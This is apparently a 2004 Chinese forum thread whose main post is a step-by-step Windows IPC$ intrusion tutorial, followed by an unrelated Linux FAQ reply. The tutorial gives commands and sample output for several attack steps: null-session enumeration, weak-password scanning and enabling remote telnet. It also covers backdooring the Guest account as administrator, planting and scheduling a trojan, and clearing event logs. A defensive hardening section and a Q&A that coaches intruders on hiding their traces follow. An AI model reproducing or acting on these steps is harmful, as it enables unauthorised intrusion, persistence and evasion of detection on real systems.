空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组：
Everyone
Network
在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？


四 空会话可以做什么


对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令：


1 首先，我们先建立一个空会话（需要目标开放ipc$）
命令：net use \\ip\ipc$ "" /user:""
注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。


2 查看远程主机的共享资源
命令：net view \\IP
解释：建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下类似类似结果：
在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。


3 查看远程主机的当前时间
命令：net time \\IP
解释：用此命令可以得到一个远程主机的当前时间。


4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）
nbtstat -A IP
用此命令可以得到一个远程主机的NetBIOS用户名列表（需要你的netbios支持），返回如下结果：

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的操作会在EventLog中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？


五 ipc$所使用的端口


首先我们来了解一些基础知识：
1 SMBServer Message Block) Windows协议族，用于文件打印共享的服务；
2 NBTNETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现，而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。

有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：

对于win2000客户端来说：
1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败；
2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。由此可见，禁止了NBT后的win 2000对win NT的共享访问将会失败。


对于win2000服务器端来说：
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放；
2 如果禁止NBT，那么只有445端口开放。


我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。


六 ipc$连接在hack攻击中的意义


就像上面所说的，即使你建立了一个空的连接，你也可以获得不少的信息（而这些信息往往是入侵中必不可少的），如果你能够以某一个具有一定权限的用户身份登陆的话，那么你就会得到相应的权限，显然，如果你以管理员身份登陆,嘿嘿,那你可就了不得了，基本上可以为所欲为了。不过你也不要高兴的太早，因为管理员的密码不是那么好搞到的，虽然会有一些粗心的管理员存在弱口令，但这毕竟是少数，而且现在不比从前了，随着人们安全意识的提高，管理员们也愈加小心了，得到管理员密码将会越来越难的，因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接，甚至在主机不开启ipc$共享时，你根本就无法连接，你会慢慢的发现ipc$连接并不是万能的，所以不要奢望每次连接都能成功，那是不现实的。
是不是有些灰心？倒也不用,关键是我们要摆正心态，不要把ipc$入侵当作终极武器，不要认为它战无不胜,它只是很多入侵方法中的一种，你有可能利用它一击必杀，也有可能一无所获，这些都是正常的，在黑客的世界里，不是每条大路都能通往罗马，但总有一条路会通往罗马，耐心的寻找吧！


七 ipc$连接失败的常见原因

以下是一些常见的导致ipc$连接失败的原因：


1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；


2 如果想成功的建立一个ipc$连接，就需要对方开启ipc$共享，即使是空连接也是这样，如果对方关闭了ipc$共享，你将会建立失败；


3 你未启动Lanmanworkstation服务，它提供网络链结和通讯，没有它你无法发起连接请求（显示名为：Workstation）；


4 对方未启动Lanmanserver服务，它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它远程主机将无法响应你的连接请求（显示名为：Server）；


5 对方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份；


6 对方禁止了NBT（即未打开139端口）；


7 对方防火墙屏蔽了139和445端口；


8 你的用户名或者密码错误（显然空会话排除这种错误）；


9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可；


10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。


另外,你也可以根据返回的错误号分析原因：
错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows无法找到网络路径：网络有问题；
错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连；
错误号1326，未知的用户名或错误密码：原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；
错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。


八 复制文件失败的原因


有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？


1 盲目复制
这类错误出现的最多，占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况，不要认为ipc$连接建立成功了就一定有共享文件夹。


2 默认共享判断错误
这类错误也是大家经常犯的，主要有两个小方面：

1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向admin$之类的默认共享复制文件，导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享并不是ipc$共享的必要条件；

2）由于net view \\IP 无法显示默认共享（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的操作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以避免此类错误的发生）


3用户权限不够，包括四种情形：
1）空连接向所有共享（默认共享和普通共享）复制时，大多情况下权限是不够的；
2）向默认共享复制时，要具有管理员权限；
3）向普通共享复制时，要具有相应权限（即对方事先设定的访问权限）；
4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；

还需要说明一点：不要认为administrator就一定是管理员，管理员名称是可以改的。


4被防火墙杀死或在局域网
也许你的复制操作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；还有可能你把木马复制到了局域网内的主机，导致连接失败。因此建议你复制时要小心，否则就前功尽弃了。


呵呵，大家也知道，ipc$连接在实际操作过程中会出现千奇百怪的问题，上面我所总结的只是一些常见错误，没说到的，只能让大家自己去体会了。


九 如何打开目标的IPC$共享以及其他共享


目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等，然后在shell下执行net share ipc$来开放目标的ipc$，用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹，你可以用net share baby=c:\，这样就把它的c盘开为共享名为baby共享了。


十 一些需要shell才能完成的命令


看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令：

1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在shell下完成；

2 打开远程主机的ipc$共享，默认共享，普通共享的操作需要在shell下完成；

3 运行/关闭远程主机的服务，需要在shell下完成；

4 启动/杀掉远程主机的进程，也需要在shell下完成。


十一 入侵中可能会用到的相关命令


请注意命令适用于本地还是远程，如果适用于本地，你只能在获得远程主机的shell后，才能向远程主机执行。

1 建立空连接:
net use \\IP\ipc$ "" /user:""

2 建立非空连接:
net use \\IP\ipc$ "psw" /user:"account"

3 查看远程主机的共享资源（但看不到默认共享）
net view \\IP

4 查看本地主机的共享资源（可以看到本地的默认共享）
net share

5 得到远程主机的用户名列表
nbtstat -A IP

6 得到本地主机的用户列表
net user

7 查看远程主机的当前时间
net time \\IP

8 显示本地主机当前服务
net start

9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y

10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘

11 删除共享映射
net use c: /del 删除映射的c盘，其他盘类推
net use * /del /y删除全部

12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名，如：
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务
at \\ip 时间 程序名，如：
at \\127.0.0.0 11:00 love.exe
注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径


14 开启远程主机的telnet
这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求：

1）目标开启了ipc$共享
2）你要拥有管理员密码和帐号
3）目标开启RemoteRegistry服务，用户就该ntlm认证
4）对WIN2K/XP有效，NT未经测试
命令格式：OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下：c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 关闭远程主机的telnet
同样需要一个小程序：ResumeTelnet.exe
命令格式：ResumeTelnet.exe \\server account psw
试例如下：c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del


（本教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区原创http://ccbirds.yeah.net）

---

作者: yao135128    时间: 2004-6-11 22:16
接上
十二 ipc$完整入侵步骤祥解

其实入侵步骤随个人爱好有所不同，我就说一下常见的吧，呵呵，献丑了！

1 用扫描软件搜寻存在若口令的主机，比如流光，SSS，X-scan等，随你的便，然后锁定目标，如果扫到了管理员权限的口令，你可以进行下面的步骤了，假设你现在得到了administrator的密码为空


2 此时您有两条路可以选择：要么给对方开telnet（命令行）,要么给它传木马（图形界面），那我们就先走telnet这条路吧


3上面开telnet的命令没忘吧，要用到opentelnet这个小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe

Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!

NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service...
telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*说明你已经打开了一个端口90的telnet。


4 现在我们telnet上去
telnet 192.168.21.* 90
如果成功，你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了，那么做点什么呢？把guest激活再加入管理组吧，就算留个后门了


5 C:\>net user guest /active:yes
*将Guest用户激活，也有可能人家的guest本来就试活的，你可以用net user guest看一下它的帐户启用的值是yes还是no


6 C:\>net user guest 1234
*将Guest的密码改为1234,或者改成你喜欢的密码


7 C:\>net localgroup administrators guest /add
*将Guest变为Administrator，这样，即使以后管理员更改了他的密码，我们也可以用guest登录了，不过也要提醒您，因为通过安全策略的设置，可以禁止guest等帐户的远程访问，呵呵，如果真是这样，那我们的后门也就白做了，愿上帝保佑Guest。


8 好了，现在我们来走另一条路，给它传个木马玩玩


9 首先，我们先建立起ipc$连接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator


10 既然要上传东西，就要先知道它开了什么共享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了，我们看到对方共享了C,D两个盘，我们下面就可以向任意一个盘复制文件了。再次声明，因为用net view命令无法看到默认共享，因此通过上面返回的结果，我们并不能判断对方是否开启了默认共享。


11 C:\>copy love.exe \\192.168.21.*\c
已复制 1 个文件
*用这个命令你可以将木马客户端love.exe传到对方的c盘下，当然，如果能复制到系统文件夹下是最好的了，不容易被发现


12 运行木马前，我们先看看它现在的时间
net time \\192.168.21.*
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00
命令成功完成


13 现在我们用at运行它吧，不过对方一定要开了Task Scheduler服务（允许程序在指定时间运行），否则就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了一项作业，其作业 ID = 1


14 剩下就是等了，等过了11:02，你就可以用控制端去连接了，如果成功你将可以用图形界面去控制远程主机了，如果连接失败，那么它可能在局域网里，也可能程序被防火墙杀了，还可能它下线了（没这么巧吧），无论哪种情况你只好放弃了


嗯，好了，两种基本方法都讲了。如果你对上面的操作已经轻车熟路了，也可以用更高效的套路，比如用CA克隆guest，用psexec执行木马，用命令：psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等，这些都是可以得，随你的便。不过最后不要忘了把日志清理干净，可以用榕哥的elsave.exe。
讲了ipc$的入侵，就不能不说如何防范，那么具体要怎样做呢？看下面


十三 如何防范ipc$入侵


1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)

方法1：
运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：1
如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但限制通过这种连接得到列举SAM帐号和共享等信息；在Windows 2000 中增加了"2"，限制所有匿名访问除非特别授权，如果设置为2的话,可能会有一些其他问题发生，建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。

方法2：
在本地安全设置－本地策略－安全选项－在'对匿名连接的额外限制'中做相应设置


2 禁止默认共享

1）察看本地共享资源
运行-cmd-输入net share

2）删除共享（重起后默认共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务
net stop server /y （重新启动后server服务会重新开启）

4）禁止自动打开默认共享（此操作并未关闭ipc$共享）
运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加。


3 关闭ipc$和默认共享依赖的服务:server服务
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用
这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于lanmanserver，不要管它。


4 屏蔽139，445端口
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。

1）139端口可以通过禁止NBT来屏蔽
本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项

2）445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完后重启机器

注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。


3）安装防火墙进行端口过滤


5 设置复杂密码，防止通过ipc$穷举出密码。


十四 ipc$入侵问答精选


上面说了一大堆的理论东西，但在实际中你会遇到各种各样的问题，因此为了给予大家最大的帮助，我看好几个安全论坛，找了n多的帖子，从中整理了一些有代表性的问答，其中的一些答案是我给出的，一些是论坛上的回复，如果有什么疏漏和错误，还请包涵。


1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？

答：留下记录是一定的，你走后用程序删除就可以了，或者用肉鸡入侵。


2.你看下面的情况是为什么，可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功

答：可能有两个原因：
1）你的权限不够，不能访问默认共享；

2）对方没有开启admin$默认共享，不要认为能进行ipc$连接，对方就一定开了默认共享（很多人都这么以为，误区！！），此时你可以试试别的默认共享或普通共享，比如c$,d$,c,d等，如果还是不行，就要看你的权限了，如果是管理员权限，你可以开telnet,如果能成功，在给它开共享也行。


3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？

答：建议先用流光或者别的什么猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。


4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？

答：首先纠正你的一个错误，用net view是无法看到默认共享的。既然你现在有管理员权限，而且对方又开了ipc$,建议你用opentelnet.exe这个小程序打开它的telent,在获得了这个shell之后，做什么都可以了。


5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？
net uset ccbirds /add

答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell,只有在获得一个shell之后，你才能在远程建立一个帐户，否则你的操作只是在本地进行。


6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？

答：不能copy文件有多个可能，除了权限不够外，还可能是对方c$,d$等默认管理共享没开，或者是对方为NTFS文件格式，通过设置，管理员也未必能远程写文件。既然你有管理员权限，那就开telnet上去吧，然后在开它的共享。


7.我用Win98能与对方建立ipc$连接吗？

答：不可以的，要进行ipc$的操作，建议用win2000


8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？

答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；或者你自己的NBT没有打开，netstat是建立在NBT之上的。　　


9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？

答：呵呵，这说明你与目标主机建立了一个以上的ipc$连接，这是不允许的，把其他的删掉吧：net use \\*.*.*.*\ipc$ /del


10.我在映射的时候出现：
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事？

答：你也太粗心了吧，这说明你的h盘正在使用，映射到别的盘符吧！


11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"ccbirds" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。

答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。


12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？

答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享.


13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？

答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。


14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码，怎么回事情呢？

答：虽然你具有管理员权限，但管理员在设置c盘共享权限时可能并未设置允许administrator访问，所以会出现问题。


15.如果自己的机器禁止了ipc$, 是不是还可以用ipc连接别的机器？

答：可以的。

---

作者: 5shinibaba    时间: 2004-6-11 22:18
很详细，辛苦了，精华奖励

---

作者: gogofeng    时间: 2004-6-11 22:32
详细明廖,好.

---

作者: amigo2003    时间: 2004-6-11 23:08
了解Linux基础知识及概念99问
一、 直击Linux：12问
1.什么是Linux？
Linux是一个诞生于网络、成长于网络且成熟于网络的奇特的作系统。1991年，芬兰大学生Linus Torvalds萌发了开发一个自由的UNIX作系统的想法，当年，Linux就诞生了，为了不让这个羽毛未丰的作系统矢折，Linus将自已的作品Linux通过Internet发布。从此一大批知名的、不知名的电脑黑客、编程人员加入到开发过程中来，Linux逐渐成长起来。
Linux一开始是要求所有的源码必须公开，并且任何人均不得从Linux交易中获利。然而这种纯粹的自由软件的理想对于Linux的普及和发展是不利的，于是Linux开始转向GPL，成为GNU阵营中的主要一员。
现在，Linux凭借优秀的设计，不凡的性能，加上IBM、INTEL、CA、CORE、ORACLE等国际知名企业的大力支持，市场份额逐步扩大，逐渐成为主流作系统之一。

2.什么是自由软件？
自1984年起，麻省理工学院开始支持"世界最后一名黑客"Richard stallman在软件开发团体中发起自由软件运动，从而自由软件基金会FSF、GPL协议和GNU项目就此诞生，掀开了自由软件革命的序章。
GPL，通用公共许可协议，这是与传统商业软件许可协议CopyRight对立的，所以又被戏称为CopyLeft。GPL保证任何人有共享和修改自由软件的自由。任何人有权取得、修改和重新发布自由软件的源代码，并且规定在不增加附加费用的条件下可以得到自由软件的源代码。同时还规定自由软件的衍生作品必须以GPL作为它重新发布的许可协议。
而GNU项目的目标是建立可自由发布的、可移植的UNIX类作系统。

3.从技术上说，Linux有什么优点？
1） 提供了先进的网络支持：内置TCP/IP协议；
2） 真正意义上的多任务、多用户作系统；
3） 与UNIX系统在源代码级兼容，符合IEEE POSIX标准；
4） 核心能仿真FPU；
5） 支持数十种文件系统格式；
6） 完全运行于保护模式，充分利用了CPU性能；
7） 开放源代码，用户可以自己对系统进行改进；
8） 采用先进的内存管理机制，更加有效地利用物理内存；

4.我需要学习Linux吗？
电脑初学者：强烈建议你远离配置、管理均相当繁琐的Linux，去拥抱Windows那通俗易懂的图形界面；
文字处理者：Windows多年的发展，已经开发出了一套"所见即所得"文字处理软件，犯不着与黑底白字的vi较劲；
编程爱好者：Linux的源代码完全公开，是编程爱好者的福音。剖析内核，量身定做不是你的愿望吗？怎么样，试试吧！
网络管理员：拥抱Linux吧。据权威机构评测 ，Linux在同配置机器上的网络服务效率是NT的1.8倍，而且还是免费的，老板一定会笑的。
总之，如果你具备以下条件之一，就拥抱Linux吧：
1） 对编程有狂爱，总喜欢用程序解决问题；
2） 具有较强的钻研精神，喜欢对问题刨根问底；
3） 对构造网络服务器有兴趣的人；
4） 你的PC老掉牙了，跑Windows像蜗牛；
5） 想学习、了解UNIX作系统；
6） 极其厌恶Windows的蓝屏死机；
7） 不想花钱，又想用正版软件的人。

5.Linux会取代Windows 9x吗？
计算机在应用中可以分为桌面应用（工作站/客户机）和服务器应用，桌面应用直接面向客户，实现一些个性化的工作；服务器应用则是一些后台处理系统，实现一些共性的服务工作。对于桌面应用来说，易用性十分重要，而对于服务器而言，性能可靠、稳定才是更重要的。
所以为服务器设计的性能可靠、稳定的UNIX作系统与为桌面系统设计的用户界面友好的Windows 9x系统一直是长期并存的主流作系统。
Linux作系统是一种类UNIX作系统，其设计上对稳定性的考虑比易用性考虑要多得多，它不是一种桌面系统，它也不是为了取代桌面系统而出现的。所以Linux不会取代Windows 9x。

6.Linux与WindowsNT谁更好？
WindowsNT作系统是微软公司进军服务器作系统的利器，设计系统时在满足服务器需求的前提下，融入了Windows 9x的图形化界面的优势，使得其易于使用，深受用户喜欢，其市场占有率也因此节节上升。
然而图形界面的代价，使系统的效率降低了，所以它适合中小企业、个人用户、对性能要求不严格的场合选用。
而Linux则适用于强调性能指标，对用户界面要求不大的的应用上。

7.Linux与UNIX有什么不同？
Linux也是属于UNIX家族的一员，它有许多特性是与UNIX相同的，它们之间的最大区别在于以下两点：
1） UNIX系统大多是与硬件配套的，而Linux则可运行在多种硬件平台上；
2） UNIX是商业软件，而Linux是自由软件，免费、公开源代码的。

8.Linux能应用在哪些领域呢？
1） 教育领域：设计先进、公开源代码这两大特性使得Linux成为了作系统课的活教材；
2） 网络服务器领域：稳定、健壮、系统要求低、网络功能强使得Linux成为现在Internet服务器作系统的首选，现已达到了25%的占有率；
3） 企业Intranet：可以用低廉的投入架设E-MAIL服务器、WWW服务器、代理服务器、透明网关、路由器；
4） 视频制作领域：著名的《泰坦尼克号》就是由200多台Linux协作完成其中的特技效果的。

9.Linux作系统发展现状和未来如何？
在2000年的LinuxWorld大会上，明显感觉到：社会各界对免费发布的作系统的支持的力度大大增强了，特别是许多硬件厂商，比如 IBM、HP和 Dell 纷纷加入到Linux领域，极大地促进了这种作系统的发展。
虽然，现在纷繁复杂的多种Linux发行版，各自为阵，降低了Linux的整体战斗力。但业界认为，不同的发行版本最终会产生不断细分的市场，各个版本将专注处理比较专业的东西。
Linux作系统经历过市场的洗礼之后，一定会创造出更大的辉煌。

10.Linux对软件业有什么影响呢？
最早，程序是程序员思想的结晶，是人类共同的文化。后来，微软公司的创始人比尔.盖茨先生创建了一个全新的软件产业模式：程序是花钱购买的，源程序是程序员的知识产权，是需要保护的。这个软件的商业模式缔造了微软帝国，也将比尔推到了世界首富的位置。
如果说，微软的Windows为世界做了很大的贡献的话，那么同时它也会软件业的发展带来了垄断和铜臭。自由软件FSF组织就是想通过GNU项目来打破这一格局，再次让所有人共享程序员思想的结晶----源代码。
而Linux的加盟，使得自由软件组织更具有战斗力，事实证明，的确对现在的软件业造成了深远影响。同时，Linux奇特的开发方式，也为软件业的创新提供了宝贵经验。

11.我该如何学习Linux呢？
1） 多阅读Linux书籍，如《Linux大全》、《RedHat Linux奥秘》、《Linux系统管理白皮书》等；
2） 敢于尝试，经常使用Linux，从实践中学习Linux，别怕"try again"；
3） 经常通过网络与Linux爱好者们互相交流，提高自己。

12.网上有哪些Linux资源？
在Internet上，关于Linux的网站很多，其中比较优秀的中文网站有：
1） www.linuxaid.com.cn：设有Linux论坛、在线答疑、知识库、在线培训、解决方案等栏目；
2） www.linuxforum.net：这里应该是人气最旺的Linux论坛；
3） www.lslnet.com/linux：是一个更新较快的Linux专题网站；
4） www.linuxbyte.com：是一个较好的Linux网站；
5） www.clinuxdevelop.org：中国Linux开发联盟；
6） clyan.hongnet.com：linux数据库应用指南。


二、 Linux大观：7问

13.RedHat Linux 6.5和Linux 2.4哪个版本高？
最近许多报刊、网站都介绍了Linux的最新版 2.4怎样，怎样？而许多Linux初学者正在使用的是RedHat Linux 6.5版。哪个版本更高？
其实，这两个版本号是不同的！RedHat Linux是将Linux内核与Linux的一些常用配套软件、应用软件捆绑在一起的发行版，6.5是这个发行版的版本号。而Linux 2.4则是指Linux内核的版本。
Linux核心是由linus维护的，它的版本号一般由二到三个部分组成，例如现在最稳定的2.2.15：
1） 第一个2是主版本号，一般在一个时期内比较稳定；
2） 第二个2是次版本号，如果是偶数，代表是正式版，如果是奇数，代表是开发过程中的测试版，如在2.4正式出来时，2.3.x就是在开发者间使用的测试版的版本号；
3） 最后一个15是修改号，如2.2.15就是对2.2.14做了一些小的修改而来。
这种特殊的版本命名法是为了便于在Internet上共同开发而制定的。

14.Linux的发行版有哪些？
Linux的发行版就是将Linux核心与应用软件做一个打包。较知名的有：SlackWare、RedHat、Debain、Mandrake、SuSE、Xlinux、TurboLinux、BluePoint、RedFlag、Xterm等。

15.RedHat Linux有哪些特点？
RedHat Linux是最成熟的一种Linux发行版，其无论在销售还是装机量上都是市场上的老大。在中国老一辈Linux爱好者中几乎都是RedHat的使用者。市场上有大量的文章是针对RedHat来说的。
RedHat Linux朴实、简洁、稳定，是作为商业应用、钻研Linux的好平台。

16.TurboLinux有哪些特点？
TurboLinux是一家美国公司建立的发行版，早期其致力于Linux的国际化工作，它的中文版，是最早的成熟中文Linux发行版。TurboLinux注重面向具体应用，开发出针对不同应用的发行版，在国际影响力方面越来越大，是RedHat的一个主要竞争对手。

17.BluePoint、Xterm、RedFlag三种中文Linux谁好？
BludePoint Linux是由Devin、Samuel、hahalee三个中国内核黑客通过互联网联手合作的杰作，在互联网上深受中国Linux爱好者的好评。它最主要的特点是：内核级的汉化，有许多自己的东西。
